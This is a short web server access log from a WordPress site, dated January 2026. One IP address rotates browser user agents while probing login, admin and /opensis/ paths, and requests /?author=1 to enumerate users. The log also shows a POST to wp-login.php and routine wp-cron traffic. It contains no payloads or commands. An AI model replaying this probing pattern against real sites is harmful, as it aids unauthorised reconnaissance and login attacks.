212.56.47.186 - - [13/Jan/2026:19:36:03 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
165.232.54.158 - - [13/Jan/2026:19:36:09 +0800] "POST /opensis/index.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:19:36:15 +0800] "POST /wp-cron.php?doing_wp_cron=1768304175.4151730537414550781250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:36:12 +0800] "POST /index.php HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
103.4.122.14 - - [13/Jan/2026:19:36:44 +0800] "POST /wp-cron.php?doing_wp_cron=1768304204.6508250236511230468750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:36:41 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:19:36:51 +0800] "POST /wp-cron.php?doing_wp_cron=1768304211.0277650356292724609375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:36:48 +0800] "GET /wp-admin/index.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:37:13 +0800] "GET /?author=1 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Mobile/15E148 Safari/604.1"
